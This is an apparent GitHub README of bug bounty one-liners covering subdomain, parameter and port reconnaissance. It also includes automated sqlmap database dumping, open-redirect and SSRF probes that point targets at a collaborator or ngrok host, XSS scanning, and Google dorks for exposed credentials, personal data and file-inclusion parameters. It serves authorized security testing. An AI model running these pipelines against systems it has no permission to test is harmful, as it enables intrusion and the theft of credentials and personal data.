MrEmpy / BugBountyTricks

ใ€Œ๐Ÿžใ€Bug Bounty Tricks

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

ใ€Œ๐Ÿžใ€Bug Bounty Tricks

Welcome to my repository! I'll leave here all the tricks I developed throughout my career as a Bug Hunter, I hope to help you.

Requirements:

Unix Terminal:

Extract subdomains and check if it's active

sublist3r -d scope.com -o extracted_subdomains.txt;cat extracted_subdomains.txt | httpx -silent -o verified_subdomains.txt;cat verified_subdomains.txt | awk -F[/:] '{print $4}' | anew > subdomains.txt;rm verified_subdomains.txt extracted_subdomains.txt

cat domains.txt | assetfinder -subs-only | httpx -silent | awk -F[/:] '{print $4}' | tee -a subdomains.txt

Extract subdomains (manually)

for scope in $(cat domains.txt);do curl "https://web.archive.org/cdx/search/cdx?url=*.$scope/*&output=text&fl=original&collapse=urlkey" | awk -F[/:] '{print $4}' | anew | sed -e 's/:80//' | httpx -silent | awk -F[/:] '{print $4}' | tee -a subdomains.txt;done

Extract IPs from a list of subdomains

for scope in $(cat subdomains.txt);do dig +short $scope | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' | anew | tee -a ips.txt;done

Extract parameters from a list of subdomains

for scope in $(cat subdomains.txt);do paramspider -d $scope;done;cat output/* > parameters.txt;rm -r output

cat domains.txt | waybackurls | sed -e 's/:80//' | grep "?[a-z0-9]*="

Extract parameters from a list of subdomains (manually)

for scope in $(cat domains.txt);do curl "https://web.archive.org/cdx/search/cdx?url=*.$scope/*&output=text&fl=original&collapse=urlkey" | grep "?[a-z0-9]*=" | sed -e 's/:80//' | tee -a parameters.txt;done

Scan ports on a host quickly

SCOPE=192.168.0.0/24;RPORT=22,80,443;rustscan -b 500 -a $SCOPE -p $RPORT | grep "Open $SCOPE[0-9]*" | tee -a ports_scanned.txt

Extract JS files with GetJS

cat subdomains.txt | getJS --complete | anew | tee -a js.txt

Extract JS files

for scope in $(cat subdomains.txt);do curl "https://web.archive.org/cdx/search/cdx?url=$scope/*&output=text&fl=original&collapse=urlkey" | grep "\\.js" | sed -e 's/:80//' | tee -a js.txt;done

Extract json files

cat domains.txt | waybackurls | grep "\\.json" | anew | tee -a json.txt

Extract subdomains and capture the screen

assetfinder -subs-only scope.com | httpx -silent -o verified_subdomains.txt;cat verified_subdomains.txt | awk -F[/:] '{print $4}' | anew > subdomains.txt;rm verified_subdomains.txt;eyewitness -f subdomains.txt --prepend-https -d screenshots

Extract subdomains and comments in source code

assetfinder -subs-only scope.com | httpx -silent | html-tool comments

Extract subdomains by ASN

echo AS394161 | asnmap -silent | tlsx -silent -san -cn -resp-only | sort -u

Extract subdomains and open redirect parameters

assetfinder -subs-only scope.com | waybackurls | gf redirect | xargs -I@ sh -c 'oralyzer -u @'

Extract all subdomains with CMS WordPress

echo scope.com | assetfinder -subs-only | waybackurls | grep 'wp-content' | httpx -silent | awk -F[/:] '{print $4}' | anew

Verify SQL Injection

cat domains.txt | waybackurls | grep "?[a-z0-9]*=" | sed -e 's/:80//' | gf sqli | sqlmap --risk 3 --batch --dbs

Easy Open Redirect by endpoint injection

for x in $(cat domains.txt | assetfinder -subs-only | httpx -silent);do echo "$x//<BURP SUITE COLLABORATOR OR NGROK>/%2F.." | httpx -silent -follow-redirects;done

Automatic Open Redirect

cat domains.txt | waybackurls | gf redirect | qsreplace <http://BURP SUITE COLLABORATOR OR NGROK> | httpx -silent -follow-redirects

Automatic SSRF

cat domains.txt | waybackurls | gf ssrf | qsreplace <http://BURP SUITE COLLABORATOR OR NGROK> | httpx -silent -follow-redirects

Verify Cross-Site Scripting (XSS)

cat parameters.txt | gf xss > xss_parameters.txt;dalfox file xss_parameters.txt --skip-bav -o dalfox.txt

Google Dorks:

Confidential files

site:*.scope.com ext:pdf intext:"name" intext:"email" intext:"phone" intext:"address"
site:*.scope.com ext:pdf intext:"name" intext:"email" intext:"<@domain.com>" intext:"phone" intext:"address"
site:*.scope.com ext:pdf intext:"name" intext:"email" intext:"phone" intext:"city" intext:"state" intext:"zipcode"
site:groups.google com "<TARGET>"

Files containing credentials

site:*.scope.com ext:sql
site:*.scope.com ext:env
site:*.scope.com ext:txt
site:*.scope.com ext:sql intext:"Dumping data for table `users`" | `password` | `name`
site:*.scope.com ext:txt intext:"<@domain.com>" intext:email intext:password

Open Redirect

site:*.scope.com inurl:?RedirectUrl=
site:*.scope.com inurl:?page=
site:*.scope.com inurl:?url=
site:*.scope.com inurl:?uri=
site:*.scope.com inurl:?u=
site:*.scope.com inurl:?return=
site:*.scope.com inurl:?redirectBack=
site:*.scope.com inurl:?redir=
site:*.scope.com inurl:?returnurl=
site:*.scope.com inurl:?return_url=
site:*.scope.com inurl:?link=
site:*.scope.com inurl:?location=
site:*.scope.com inurl:?referrer=
site:*.scope.com inurl:?back=
site:*.scope.com inurl:?home=
site:*.scope.com inurl:?return_to=
site:*.scope.com inurl:?startUrl=

(LFI) Local File Inclusion & (RFI) Remote File Inclusion

site:*.scope.com inurl:?file=
site:*.scope.com inurl:download.php?file=
site:*.scope.com inurl:cat.php?file=
site:*.scope.com inurl:?cat=
site:*.scope.com inurl:read.php?file=
site:*.scope.com inurl:index.php?include=
site:*.scope.com inurl:index.php?file=
site:*.scope.com inurl:index.php?inc=
site:*.scope.com inurl:index.php?open=
site:*.scope.com inurl:index.php?content=
site:*.scope.com inurl:index.php?configFile=
site:*.scope.com inurl:index.php?page=
site:*.scope.com inurl:index.php?template=
site:*.scope.com inurl:index.php?archive=

Sites with CMS WordPress

site:*.scope.com inurl:wp-content
site:*.scope.com inurl:wp-content/uploads/<YEAR>/<MONTH>
site:*.scope.com inurl:wp-includes
site:*.scope.com intitle:"Author at"
site:*.scope.com intitle:WordPress intitle:ReadMe ext:html

About

ใ€Œ๐Ÿžใ€Bug Bounty Tricks